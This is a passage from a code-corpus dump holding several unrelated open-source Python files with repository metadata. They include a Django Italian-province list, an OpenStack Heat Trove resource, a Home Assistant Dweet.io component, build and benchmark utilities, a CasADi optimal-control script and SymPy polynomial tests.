            self.game_three = viewed_match.games[2]
if viewed_match.has_unexpected_third_game is None:
importing.reimport(viewed_match)
self.has_unexpected_third_game = viewed_match.has_unexpected_third_game
if viewed_match.is_tournament is None:
importing.reimport(viewed_match)
self.is_tournament = viewed_match.is_tournament
def og_title(self) -> str:
        return self.players_string
def og_url(self) -> str:
return url_for('show_match', match_id=self.id, _external=True)
def og_description(self) -> str:
p = inflect.engine()
fmt = titlecase.titlecase(p.a(self.format_name))
description = '{fmt} match.'.format(fmt=fmt)
return description
def player_link(name: str) -> str:
url = url_for('show_person', person=name)
return '<a href="{url}">{name}</a>'.format(url=html.escape(url), name=html.escape(name))
|
jonaustin/advisoryscan
|
django/django/contrib/localflavor/it/it_province.py
|
Python
|
mit
| 2,747
| 0.001458
|
# -*- coding: utf-8 -*-
PROVINCE_CHOICES = (
('AG', 'Agrigento'),
('AL', 'Alessandria'),
('AN', 'Ancona'),
('AO', 'Aosta'),
('AR', 'Arezzo'),
('AP', 'Ascoli Piceno'),
('AT', 'Asti'),
('AV', 'Avellino'),
('BA', 'Bari'),
# ('BT', 'Barletta-Andria-Trani'), # active starting from 2009
('BL', 'Belluno'),
('BN', 'Benevento'),
('BG', 'Bergamo'),
('BI', 'Biella'),
('BO', 'Bologna'),
('BZ', 'Bolzano/Bozen'),
('BS', 'Brescia'),
('BR', 'Brindisi'),
('CA', 'Cagliari'),
('CL', 'Caltanissetta'),
('CB', 'Campobasso'),
('CI', 'Carbonia-Iglesias'),
('CE', 'Caserta'),
('CT', 'Catania'),
('CZ', 'Catanzaro'),
('CH', 'Chieti'),
('CO', 'Como'),
('CS', 'Cosenza'),
('CR', 'Cremona'),
('KR', 'Crotone'),
('CN', 'Cuneo'),
('EN', 'Enna'),
# ('FM', 'Fermo'), # active starting from 2009
('FE', 'Ferrara'),
('FI', 'Firenze'),
('FG', 'Foggia'),
('FC', 'Forlì-Cesena'),
('FR', 'Frosinone'),
('GE', 'Genova'),
('GO', 'Gorizia'),
('GR', 'Grosseto'),
('IM', 'Imperia'),
('IS', 'Isernia'),
('SP', 'La Spezia'),
    ('AQ', u'L’Aquila'),
('LT', 'Latina'),
('LE', 'Lecce'),
('LC', 'Lecco'),
('LI', 'Livorno'),
('LO', 'Lodi'),
('LU', 'Lucca'),
('MC', 'Macerata'),
('MN', 'Mantova'),
('MS', 'Massa-Carrara'),
('MT', 'Matera'),
('VS', 'Medio Campidano'),
('ME', 'Messina'),
('MI', 'Milano'),
('MO', 'Modena'),
# ('MB', 'Monza e Brianza'), # active starting from 2009
('NA', 'Napoli'),
('NO', 'Novara'),
('NU', 'Nuoro'),
('OG', 'Ogliastra'),
('OT', 'Olbia-Tempio'),
('OR', 'Oristano'),
('PD', 'Padova'),
('PA', 'Palermo'),
('PR', 'Parma'),
('PV', 'Pavia'),
('PG', 'Perugia'),
('PU', 'Pesaro e Urbino'),
('PE', 'Pescara'),
('PC', 'Piacenza'),
('PI', 'Pisa'),
('PT', 'Pistoia'),
('PN', 'Pordenone'),
('PZ', 'Potenza'),
('PO', 'Prato'),
('RG', 'Ragusa'),
('RA', 'Ravenna'),
('RC', 'Reggio Calabria'),
('RE', 'Reggio Emilia'),
('RI', 'Rieti'),
    ('RN', 'Rimini'),
    ('RM', 'Roma'),
    ('RO', 'Rovigo'),
('SA', 'Salerno'),
('SS', 'Sassari'),
('SV', 'Savona'),
('SI', 'Siena'),
('SR', 'Siracusa'),
('SO', 'Sondrio'),
('TA', 'Taranto'),
('TE', 'Teramo'),
('TR', 'Terni'),
('TO', 'Torino'),
('TP', 'Trapani'),
('TN', 'Trento'),
('TV', 'Treviso'),
('TS', 'Trieste'),
('UD', 'Udine'),
('VA', 'Varese'),
('VE', 'Venezia'),
    ('VB', 'Verbano Cusio Ossola'),
('VC', 'Vercelli'),
('VR', 'Verona'),
('VV', 'Vibo Valentia'),
('VI', 'Vicenza'),
('VT', 'Viterbo'),
)
|
openstack/heat
|
heat/engine/resources/openstack/trove/instance.py
|
Python
|
apache-2.0
| 29,344
| 0
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from heat.common import exception
from heat.common.i18n import _
from heat.engine import attributes
from heat.engine import constraints
from heat.engine import properties
from heat.engine import resource
from heat.engine import support
from heat.engine import translation
LOG = logging.getLogger(__name__)
class Instance(resource.Resource):
"""OpenStack cloud database instance resource.
Trove is Database as a Service for OpenStack. It's designed to run entirely
on OpenStack, with the goal of allowing users to quickly and easily utilize
the features of a relational or non-relational database without the burden
of handling complex administrative tasks.
"""
support_status = support.SupportStatus(version='2014.1')
TROVE_STATUS = (
ERROR, FAILED, ACTIVE,
) = (
'ERROR', 'FAILED', 'ACTIVE',
)
TROVE_STATUS_REASON = {
FAILED: _('The database instance was created, but heat failed to set '
'up the datastore. If a database instance is in the FAILED '
'state, it should be deleted and a new one should be '
'created.'),
ERROR: _('The last operation for the database instance failed due to '
'an error.'),
}
BAD_STATUSES = (ERROR, FAILED)
PROPERTIES = (
NAME, FLAVOR, SIZE, DATABASES, USERS, AVAILABILITY_ZONE,
RESTORE_POINT, DATASTORE_TYPE, DATASTORE_VERSION, NICS,
REPLICA_OF, REPLICA_COUNT,
) = (
'name', 'flavor', 'size', 'databases', 'users', 'availability_zone',
'restore_point', 'datastore_type', 'datastore_version', 'networks',
'replica_of', 'replica_count'
)
_DATABASE_KEYS = (
DATABASE_CHARACTER_SET, DATABASE_COLLATE, DATABASE_NAME,
) = (
'character_set', 'collate', 'name',
)
_USER_KEYS = (
USER_NAME, USER_PASSWORD, USER_HOST, USER_DATABASES,
) = (
'name', 'password', 'host', 'databases',
)
_NICS_KEYS = (
NET, PORT, V4_FIXED_IP
) = (
'network', 'port', 'fixed_ip'
)
ATTRIBUTES = (
HOSTNAME, HREF,
) = (
'hostname', 'href',
)
properties_schema = {
NAME: properties.Schema(
properties.Schema.STRING,
_('Name of the DB instance to create.'),
update_allowed=True,
constraints=[
constraints.Length(max=255),
]
),
FLAVOR: properties.Schema(
properties.Schema.STRING,
_('Reference to a flavor for creating DB instance.'),
required=True,
update_allowed=True,
constraints=[
constraints.CustomConstraint('trove.flavor')
]
),
DATASTORE_TYPE: properties.Schema(
properties.Schema.STRING,
_("Name of registered datastore type."),
constraints=[
constraints.Length(max=255)
]
),
DATASTORE_VERSION: properties.Schema(
properties.Schema.STRING,
_("Name of the registered datastore version. "
"It must exist for provided datastore type. "
"Defaults to using single active version. "
"If several active versions exist for provided datastore type, "
"explicit value for this parameter must be specified."),
constraints=[constraints.Length(max=255)]
),
SIZE: properties.Schema(
properties.Schema.INTEGER,
_('Database volume size in GB.'),
required=True,
update_allowed=True,
constraints=[
constraints.Range(1, 150),
]
),
NICS: properties.Schema(
properties.Schema.LIST,
_("List of network interfaces to create on instance."),
default=[],
schema=properties.Schema(
properties.Schema.MAP,
schema={
NET: properties.Schema(
properties.Schema.STRING,
_('Name or UUID of the network to attach this NIC to. '
'Either %(port)s or %(net)s must be specified.') % {
'port': PORT, 'net': NET},
constraints=[
constraints.CustomConstraint('neutron.network')
]
),
PORT: properties.Schema(
properties.Schema.STRING,
_('Name or UUID of Neutron port to attach this '
'NIC to. '
'Either %(port)s or %(net)s must be specified.') % {
'port': PORT, 'net': NET},
constraints=[
constraints.CustomConstraint('neutron.port')
],
),
V4_FIXED_IP: properties.Schema(
properties.Schema.STRING,
_('Fixed IPv4 address for this NIC.'),
constraints=[
constraints.CustomConstraint('ip_addr')
]
),
},
),
),
DATABASES: properties.Schema(
properties.Schema.LIST,
_('List of databases to be created on DB instance creation.'),
default=[],
update_allowed=True,
schema=properties.Schema(
properties.Schema.MAP,
schema={
DATABASE_CHARACTER_SET: properties.Schema(
properties.Schema.STRING,
_('Set of symbols and encodings.'),
default='utf8'
),
DATABASE_COLLATE: properties.Schema(
properties.Schema.STRING,
_('Set of rules for comparing characters in a '
'character set.'),
default='utf8_general_ci'
),
DATABASE_NAME: properties.Schema(
properties.Schema.STRING,
_('Specifies database names for creating '
'databases on instance creation.'),
required=True,
constraints=[
constraints.Length(max=64),
constraints.AllowedPattern(r'[a-zA-Z0-9_\-]+'
r'[a-zA-Z0-9_@?#\s\-]*'
|
r'[a-zA-Z0-9_\-]+'),
|
]
),
},
)
),
USERS: properties.Schema(
properties.Schema.LIST,
_('List of users to be created on DB instance creation.'),
default=[],
update_allowed=True,
schema=properties.Schema(
properties.Schema.MAP,
schema={
USER_NAME: properties.Schema(
properties.Schema.STRING,
_('User name to create a user on instance '
'creation.'),
required=True,
update_allowed=True,
constraints=[
constraints.Length(max=16),
|
franklingu/Cassandra-benchmarking
|
benchmarking/sum_up.py
|
Python
|
mit
| 1,889
| 0.004764
|
#!/usr/bin/python
import re
import csv
import os
import json
def read_csv(fn):
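    # Expected CSV layout (inferred from the checks below): 7-column rows in
    # which row[0] is a grouping key, row[1]/row[2] hold the
    # 'Total Transactions ...' name/value pair and row[3]/row[4] hold the
    # elapsed-time name/value pair; rows sharing a key are accumulated and a
    # derived 'Throughput' (transactions per unit time) is added per key.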
results = {}
with open(fn, 'rb') as csvfile:
rows = csv.reader(csvfile, delimiter=',')
for row in rows:
m = re.search('Total Transactions', row[1])
if len(row) == 7 and m:
temp = results.get(row[0])
if not temp:
results[row[0]] = {row[1]: float(row[2]), row[3]: float(row[4])}
else:
results[row[0]] = {row[1]: float(row[2]) + temp.get(row[1]),
row[3]: float(row[4]) + temp.get(row[3])}
results[row[0]]['Throughput'] = results[row[0]][row[1]] / results[row[0]][row[3]]
return results
def traverse_all_csvs(path_to_dir):
files = []
for (dirpath, dirnames, filenames) in os.walk(path_to_dir):
for fn in filenames:
m = re.search('^collections-([\-D0-9]*).csv$', fn)
if m:
files.append(fn)
break
return files
if __name__ == '__main__':
results = {}
files = traverse_all_csvs(os.path.dirname(os.path.realpath(__file__)))
for fn in files:
m = re.search('^collections-([\-D0-9]*).csv$', fn)
results[m.group(1)] = read_csv(fn)
print json.dumps(results, indent=4, separators=(',', ': '))
with open('compilation.json', 'w') as outfile:
json.dump(results, outfile, sort_keys=True, indent=4, separators=(',', ': '))
rows = [['Type', 'Total Transactions', 'Time used', 'Throughput']]
for key, value in results.iteritems():
rows.append([key, '-', '-', '-'])
for k1, v1 in value.iteritems():
            rows.append([k1, v1['Total Transactions'], v1['Time used'], v1['Throughput']])
    with open('compilation.csv', 'wb') as f:
writer = csv.writer(f)
writer.writerows(rows)
|
johnjohnlin/nicotb
|
lib/event.py
|
Python
|
gpl-3.0
| 1,550
| 0.013548
|
# Copyright (C) 2017,2019, Yu Sheng Lin, johnjohnlys@media.ee.ntu.edu.tw
# This file is part of Nicotb.
# Nicotb is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# Nicotb is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with Nicotb. If not, see <http://www.gnu.org/licenses/>.
from nicotb.common import *
from collections import deque
event_released = set()
waiting_coro = list()
event_queue = deque()
def CreateEvent(hier: str = ""):
if event_released:
n = event_released.pop()
else:
n = len(waiting_coro)
waiting_coro.append(list())
if COSIM and hier:
BindEvent(n, (TOP_PREFIX+hier).encode())
return n
def CreateEvents(descs: list):
return [CreateEvent(event) for event in descs]
def GetEvent(ev):
return ev if isinstance(ev, int) else CreateEvent(ev)
def SignalEvent(ev, all_ev=True):
event_queue.append((ev, all_ev))
def DestroyEvent(ev: int):
# Do not destroy events created with hier name
waiting_coro[ev] = list()
event_released.add(ev)
# Initialize a default event, so coroutines can implement SystemC-like dont_initialize
INIT_EVENT = CreateEvent()
SignalEvent(INIT_EVENT)
|
jgillis/casadi
|
experimental/joel/vdp/vdp.py
|
Python
|
lgpl-3.0
| 5,909
| 0.019293
|
#
# This file is part of CasADi.
#
# CasADi -- A symbolic framework for dynamic optimization.
# Copyright (C) 2010 by Joel Andersson, Moritz Diehl, K.U.Leuven. All rights reserved.
#
# CasADi is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# CasADi is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with CasADi; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
#
# -*- coding: utf-8 -*-
import os
import sys
from numpy import *
import numpy as NP
import matplotlib.pyplot as plt
import zipfile
# JModelica
from jmodelica.jmi import compile_jmu
from jmodelica.jmi import JMUModel
import jmodelica
# CasADi
from casadi import *
curr_dir = os.path.dirname(os.path.abspath(__file__));
try:
# Try the old Jmodelica syntax
jmu_name = compile_jmu("VDP_pack.VDP_Opt", curr_dir+"/VDP.mop",'optimica','ipopt',{'generate_xml_equations':True, 'generate_fmi_xml':False})
except jmodelica.compiler.UnknownOptionError:
# Try the new jmodelica syntax
jmu_name = compile_jmu("VDP_pack.VDP_Opt", curr_dir+"/VDP.mop",'optimica','ipopt',{'generate_xml_equations':True, 'generate_fmi_me_xml':False})
if True:
vdp = JMUModel(jmu_name)
res = vdp.optimize()
# Extract variable profiles
x1=res['x1']
x2=res['x2']
u=res['u']
t=res['time']
cost=res['cost']
# Plot
plt.figure(1)
plt.clf()
plt.subplot(311)
plt.plot(t,x1)
plt.grid()
plt.ylabel('x1')
plt.subplot(312)
plt.plot(t,x2)
plt.grid()
plt.ylabel('x2')
plt.subplot(313)
plt.plot(t,u)
plt.grid()
plt.ylabel('u')
plt.xlabel('time')
sfile = zipfile.ZipFile(curr_dir+'/VDP_pack_VDP_Opt.jmu','r')
mfile = sfile.extract('modelDescription.xml','.')
os.remove('VDP_pack_VDP_Opt.jmu')
os.rename('modelDescription.xml','vdp.xml')
# Allocate a parser and load the xml
parser = FMIParser('vdp.xml')
# Dump representation to screen
print "XML representation"
print parser
# Obtain the symbolic representation of the OCP
ocp = parser.parse()
# Print the ocp to screen
print ocp
# Sort the variables according to type
var = OCPVariables(ocp.variables)
# The right hand side of the ACADO functions
acado_in = ACADO_FCN_NUM_IN * [[]]
# Time
acado_in[ACADO_FCN_T] = [var.t_]
# Convert stl vector of variables to list of expressions
def toList(v, der=False):
  ret = []
for i in v:
if der:
ret.append(i.der())
else:
ret.append(i.var())
return ret
# Differential state
acado_in[ACADO_FCN_XD] = toList(ocp.x_)
# Algebraic state
acado_in[ACADO_FCN_XA] = toList(ocp.z_)
# Control
acado_in[ACADO_FCN_U] = toList(ocp.u_)
# Parameter
acado_in[ACADO_FCN_P] = toList(ocp.p_)
# State derivative
acado_in[ACADO_FCN_XDOT] = toList(ocp.x_,True)
# The DAE function
ffcn_out = list(ocp.dae) + list(ocp.ae)
ffcn = SXFunction(acado_in,[ffcn_out])
# Objective function
mfcn = SXFunction(acado_in,[ocp.mterm])
# Path constraint function
cfcn = SXFunction(acado_in,[ocp.cfcn])
# Initial constraint function
rfcn = SXFunction(acado_in,[ocp.initeq])
# Create ACADO solver
ocp_solver = AcadoInterface(ffcn,mfcn,cfcn,rfcn)
# Create an integrator
dae_in = DAE_NUM_IN * [[]]
dae_in[DAE_T] = acado_in[ACADO_FCN_T]
dae_in[DAE_Y] = acado_in[ACADO_FCN_XD] + acado_in[ACADO_FCN_XA]
dae_in[DAE_YDOT] = acado_in[ACADO_FCN_XDOT] + list(ssym("zdot",len(acado_in[ACADO_FCN_XA])))
dae_in[DAE_P] = acado_in[ACADO_FCN_P] + acado_in[ACADO_FCN_U]
dae = SXFunction(dae_in,[ffcn_out])
integrator = IdasIntegrator(dae)
#integrator.setOption("exact_jacobian",True)
#integrator.setOption("linear_multistep_method","bdf") # adams or bdf
#integrator.setOption("nonlinear_solver_iteration","newton") # newton or functional
integrator.setOption("number_of_fwd_dir",4)
integrator.setOption("number_of_adj_dir",0)
integrator.setOption("fsens_err_con",True)
integrator.setOption("quad_err_con",True)
integrator.setOption("abstol",1e-8)
integrator.setOption("reltol",1e-8)
integrator.setOption("is_differential",len(acado_in[ACADO_FCN_XD])*[1] + len(acado_in[ACADO_FCN_XA])*[0])
# Pass the integrator to ACADO
ocp_solver.setIntegrator(integrator)
# Set options
ocp_solver.setOption("start_time",ocp.t0)
ocp_solver.setOption("final_time",ocp.tf)
num_nodes = 30
ocp_solver.setOption("number_of_shooting_nodes",num_nodes)
ocp_solver.setOption("max_num_iterations",100)
ocp_solver.setOption("kkt_tolerance",1e-4)
ocp_solver.setOption("integrator","casadi")
ocp_solver.setOption("integrator_tolerance",1e-6)
# Initialize
ocp_solver.init()
# Set bounds on states
cfcn_lb = []
for i in ocp.cfcn_lb:
cfcn_lb.append(float(i))
ocp_solver.setInput(cfcn_lb,"lbc")
cfcn_ub = []
for i in ocp.cfcn_ub:
cfcn_ub.append(float(i))
ocp_solver.setInput(cfcn_ub,"ubc")
# Solve the optimal control problem
ocp_solver.solve()
# Print optimal cost
cost = ocp_solver.getOutputData(ACADO_COST)[0]
print "optimal cost = ", cost
# Print optimal parameters
popt = ocp_solver.getOutputData(ACADO_P_OPT)
print "optimal parameter values = ", popt
# Time grid
t_opt = NP.linspace(0,ocp.tf,num_nodes+1)
# Plot optimal control
u_opt = ocp_solver.getOutputData(ACADO_U_OPT)
plt.figure(3)
plt.plot(t_opt,u_opt)
# Plot optimal state trajectory
x_opt = ocp_solver.getOutputData(ACADO_X_OPT)
x_opt = array(x_opt) # create numpy array
x_opt = x_opt.reshape(num_nodes+1, 3)
plt.figure(4)
plt.plot(t_opt,x_opt)
# Show the plots
plt.ion()
plt.show()
|
sandeep6189/Pmp-Webapp
|
migrations/versions/4fe34588268f_.py
|
Python
|
bsd-3-clause
| 506
| 0.011858
|
"""empty message
Revision ID: 4fe34588268f
Revises: 26dba2ff3e74
Create Date: 2014-12-09 01:41:24.333058
"""
# revision identifiers, used by Alembic.
revision = '4fe34588268f'
down_revision = '26dba2ff3e74'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
pass
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
pass
### end Alembic commands ###
| |
wy65701436/harbor
|
make/photon/prepare/utils/registry_ctl.py
|
Python
|
apache-2.0
| 1,152
| 0.002604
|
import os
from g import config_dir, templates_dir, DEFAULT_GID, DEFAULT_UID
from utils.misc import prepare_dir
from utils.jinja import render_jinja
registryctl_config_dir = os.path.join(config_dir, "registryctl")
registryctl_config_template_path = os.path.join(templates_dir, "registryctl", "config.yml.jinja")
registryctl_conf = os.path.join(config_dir, "registryctl", "config.yml")
registryctl_env_template_path = os.path.join(templates_dir, "registryctl", "env.jinja")
registryctl_conf_env = os.path.join(config_dir, "registryctl", "env")
levels_map = {
'debug': 'debug',
'info': 'info',
'warning': 'warn',
'error': 'error',
'fatal': 'fatal'
}
def prepare_registry_ctl(config_dict):
# prepare dir
prepare_dir(registryctl_config_dir)
# Render Registryctl env
render_jinja(
        registryctl_env_template_path,
registryctl_conf_env,
**config_dict)
# Render Registryctl config
render_jinja(
registryctl_config_template_path,
registryctl_conf,
uid=DEFAULT_UID,
gid=DEFAULT_GID,
level=levels_map[config_dict['log_level']],
**config_dict)
|
dagnelies/pysos
|
test_dict.py
|
Python
|
apache-2.0
| 1,567
| 0.007658
|
import time
import test_rnd as rnd
import random
import pysos
# initialize the data
N = 1234
items = [(rnd.utf8(20), rnd.utf8(200)) for i in range(N)]
start = time.time()
db = pysos.Dict('temp/sos_dict')
#import shelve
#db = shelve.open('temp.shelve')
print("%.2fs: %d items loaded" % (time.time() - start, len(db)))
# add all items
for key,val in items:
db[key] = val
print("%.2fs: %d items added" % (time.time() - start, len(items)))
# read all keys
random.shuffle(items)
for key,val in items:
val2 = db[key]
assert val2 == val
print("%.2fs: %d items read" % (time.time() - start, len(items)))
# update all values
random.shuffle(items)
for key,val in items:
db[key] = 'updated ' + val
print("%.2fs: %d items updated" % (time.time() - start, len(items)))
# read all keys again
random.shuffle(items)
for key,val in items:
val2 = db[key]
assert val2 == 'updated ' + val
print("%.2fs: %d items read" % (time.time() - start, len(items)))
# delete all keys
random.shuffle(items)
for key,val in items:
    del db[key]
print("%.2fs: %d items deleted" % (time.time() - start, len(items)))
# add all keys
random.shuffle(items)
for key,val in items:
db[key] ='again ' + val
print("%.2fs: %d items added" % (time.time() - start, len(items)))
# read all keys again
random.shuffle(items)
for key,val in items:
val = db[key]
print("%.2fs: %d items read" % (time.time() - start, len(items)))
N = len(db)
db.close()
print("%.2fs: DB closed containing %d item" % (time.time() - start, N))
#print("free lines: %d" % len(db._free_lines))
|
chrisRubiano/TAP
|
indexing/buscar.py
|
Python
|
gpl-3.0
| 633
| 0.00158
|
import sys
import argparse
import pickle
def read_index(pickleFile):
pickleFile = open(pickleFile, 'rb')
index = pickle.load(pickleFile)
return index
def main(args):
wordIndex = read_index('indice.pickle')
docIndex = read_index('indice_doc.pickle')
wordList = args.palabras
for word in wordList:
print wordIndex[word]
# print docIndex
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Busca palabras')
    parser.add_argument('palabras', metavar='N', type=str, nargs='+', help='Palabras a buscar en el indice')
args = parser.parse_args()
main(args)
|
mikaelboman/home-assistant
|
homeassistant/components/dweet.py
|
Python
|
mit
| 1,961
| 0
|
"""
A component which allows you to send data to Dweet.io.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/dweet/
"""
import logging
from datetime import timedelta
import voluptuous as vol
from homeassistant.const import EVENT_STATE_CHANGED, STATE_UNKNOWN
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers import state as state_helper
from homeassistant.util import Throttle
_LOGGER = logging.getLogger(__name__)
DOMAIN = "dweet"
DEPENDENCIES = []
REQUIREMENTS = ['dweepy==0.2.0']
CONF_NAME = 'name'
CONF_WHITELIST = 'whitelist'
MIN_TIME_BETWEEN_UPDATES = timedelta(seconds=1)
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Required(CONF_NAME): cv.string,
vol.Required(CONF_WHITELIST): cv.string,
}),
}, extra=vol.ALLOW_EXTRA)
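# Example configuration.yaml entry matching the schema above (illustrative
# sketch only; the thing name and entity id are made up):
#
# dweet:
#   name: my-home-assistant
#   whitelist: sensor.living_room_temperature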
# pylint: disable=too-many-locals
def setup(hass, config):
"""Se
|
tup the Dweet.io component."""
conf = config[DOMAIN]
name = conf[CONF_NAME]
whitelist = conf.get(CONF_WHITELIST, [])
json_body = {}
def dweet_event_listener(event):
"""Listen for new messages on the bus and sends them to Dweet.io."""
state = event.data.get('new_state')
if state is None or state.state in (STATE_UNKNOWN, '') \
or state.entity_id not in whitelist:
return
try:
_state = state_helper.state_as_number(state)
except ValueError:
_state = state.state
json_body[state.attributes.get('friendly_name')] = _state
send_data(name, json_body)
hass.bus.listen(EVENT_STATE_CHANGED, dweet_event_listener)
return True
@Throttle(MIN_TIME_BETWEEN_UPDATES)
def send_data(name, msg):
"""Send the collected data to Dweet.io."""
import dweepy
try:
dweepy.dweet_for(name, msg)
except dweepy.DweepyError:
_LOGGER.error("Error saving data '%s' to Dweet.io", msg)
|
clchiou/scons_package
|
label.py
|
Python
|
mit
| 4,231
| 0
|
# Copyright (c) 2013 Che-Liang Chiou
import os
import re
from SCons.Script import Dir
class Label(object):
VALID_NAME = re.compile(r'^[A-Za-z0-9_.\-/]+$')
@classmethod
def make_label(cls, label_str):
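        # Accepted label forms, as handled below: a SCons File node (its source
        # path is split into package/target), '#package:target' or '#package',
        # ':target' (a target in the current package), or a bare 'target' name;
        # the package defaults to the current source directory.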
package_str = None
target_str = None
if not isinstance(label_str, str):
# Assume it is a SCons File node.
            label_str = label_str.srcnode().path
package_str, target_str = os.path.split(label_str)
elif label_str.startswith('#'):
label_str = label_str[1:]
if ':' in label_str:
package_str, target_str = label_str.split(':', 1)
else:
package_str = label_str
elif label_str.startswith(':'):
target_str = label_str[1:]
else:
target_str = label_str
package_name = PackageName.make_package_name(package_str)
if not target_str:
target_str = os.path.basename(package_name.path)
target_name = TargetName(target_str)
return cls(package_name, target_name)
@classmethod
def make_label_list(cls, label_strs):
if isinstance(label_strs, str):
label_strs = label_strs.split()
return [cls.make_label(label_str) for label_str in label_strs]
@staticmethod
def check_name(name):
if not name:
raise ValueError('empty name')
if name.startswith('/') or name.endswith('/'):
raise ValueError('leading or trailing path separator: %s' % name)
if '//' in name:
raise ValueError('consecutive path separators: %s' % name)
if not Label.VALID_NAME.match(name):
raise ValueError('invalid name character: %s' % name)
def __init__(self, package_name, target_name):
assert isinstance(package_name, PackageName)
assert isinstance(target_name, TargetName)
self.package_name = package_name
self.target_name = target_name
def __str__(self):
return '#%s:%s' % (self.package_name, self.target_name)
def __repr__(self):
return '%s("%s")' % (self.__class__.__name__, str(self))
def __eq__(self, other):
return (self.__class__ is other.__class__ and
self.package_name == other.package_name and
self.target_name == other.target_name)
def __ne__(self, other):
return not (self == other)
def __hash__(self):
return hash(repr(self))
@property
def path(self):
return os.path.join(self.package_name.path, self.target_name.path)
class LabelOfRule(Label):
pass
class LabelOfFile(Label):
pass
class PackageName(object):
@classmethod
def make_package_name(cls, package_str=None):
assert package_str is None or isinstance(package_str, str)
if not package_str:
package_str = Dir('.').srcnode().path
return cls(package_str)
def __init__(self, package_name):
assert isinstance(package_name, str)
Label.check_name(package_name)
self.package_name = package_name
def __str__(self):
return self.package_name
def __repr__(self):
return 'PackageName("%s")' % self.package_name
def __eq__(self, other):
return (self.__class__ is other.__class__ and
self.package_name == other.package_name)
def __ne__(self, other):
return not (self == other)
def __hash__(self):
return hash(self.package_name)
@property
def path(self):
return self.package_name
class TargetName(object):
def __init__(self, target_name):
assert isinstance(target_name, str)
Label.check_name(target_name)
self.target_name = target_name
def __str__(self):
return self.target_name
def __repr__(self):
return 'TargetName("%s")' % self.target_name
def __eq__(self, other):
return (self.__class__ is other.__class__ and
self.target_name == other.target_name)
def __ne__(self, other):
return not (self == other)
def __hash__(self):
return hash(self.target_name)
@property
def path(self):
return self.target_name
|
abloomston/sympy
|
sympy/polys/tests/test_polytools.py
|
Python
|
bsd-3-clause
| 106,107
| 0.001301
|
"""Tests for user-friendly public interface to polynomial functions. """
from sympy.polys.polytools import (
Poly, PurePoly, poly,
parallel_poly_from_expr,
degree, degree_list,
LC, LM, LT,
pdiv, prem, pquo, pexquo,
div, rem, quo, exquo,
half_gcdex, gcdex, invert,
subresultants,
resultant, discriminant,
terms_gcd, cofactors,
gcd, gcd_list,
lcm, lcm_list,
trunc,
monic, content, primitive,
compose, decompose,
sturm,
gff_list, gff,
sqf_norm, sqf_part, sqf_list, sqf,
factor_list, factor,
intervals, refine_root, count_roots,
real_roots, nroots, ground_roots,
nth_power_roots_poly,
cancel, reduced, groebner,
GroebnerBasis, is_zero_dimensional,
_torational_factor_list,
to_rational_coeffs)
from sympy.polys.polyerrors import (
MultivariatePolynomialError,
ExactQuotientFailed,
PolificationFailed,
ComputationFailed,
UnificationFailed,
RefinementFailed,
GeneratorsNeeded,
GeneratorsError,
PolynomialError,
CoercionFailed,
DomainError,
OptionError,
FlagError)
from sympy.polys.polyclasses import DMP
from sympy.polys.fields import field
from sympy.polys.domains import FF, ZZ, QQ, RR, EX
from sympy.polys.domains.realfield import RealField
from sympy.polys.orderings import lex, grlex, grevlex
from sympy import (
S, Integer, Rational, Float, Mul, Symbol, sqrt, Piecewise,
exp, sin, tanh, expand, oo, I, pi, re, im, RootOf, Eq, Tuple, Expr)
from sympy.core.basic import _aresame
from sympy.core.compatibility import iterable
from sympy.core.mul import _keep_coeff
from sympy.utilities.pytest import raises, XFAIL
from sympy.abc import a, b, c, d, p, q, t, w, x, y, z
from sympy import MatrixSymbol
def _epsilon_eq(a, b):
for x, y in zip(a, b):
if abs(x - y) > 1e-10:
return False
return True
def _strict_eq(a, b):
if type(a) == type(b):
if iterable(a):
if len(a) == len(b):
return all(_strict_eq(c, d) for c, d in zip(a, b))
else:
return False
else:
return isinstance(a, Poly) and a.eq(b, strict=True)
else:
return False
def test_Poly_from_dict():
K = FF(3)
assert Poly.from_dict(
{0: 1, 1: 2}, gens=x, domain=K).rep == DMP([K(2), K(1)], K)
assert Poly.from_dict(
{0: 1, 1: 5}, gens=x, domain=K).rep == DMP([K(2), K(1)], K)
assert Poly.from_dict(
{(0,): 1, (1,): 2}, gens=x, domain=K).rep == DMP([K(2), K(1)], K)
assert Poly.from_dict(
{(0,): 1, (1,): 5}, gens=x, domain=K).rep == DMP([K(2), K(1)], K)
assert Poly.from_dict({(0, 0): 1, (1, 1): 2}, gens=(
x, y), domain=K).rep == DMP([[K(2), K(0)], [K(1)]], K)
assert Poly.from_dict({0: 1, 1: 2}, gens=x).rep == DMP([ZZ(2), ZZ(1)], ZZ)
assert Poly.from_dict(
{0: 1, 1: 2}, gens=x, field=True).rep == DMP([QQ(2), QQ(1)], QQ)
assert Poly.from_dict(
{0: 1, 1: 2}, gens=x, domain=ZZ).rep == DMP([ZZ(2), ZZ(1)], ZZ)
assert Poly.from_dict(
{0: 1, 1: 2}, gens=x, domain=QQ).rep == DMP([QQ(2), QQ(1)], QQ)
assert Poly.from_dict(
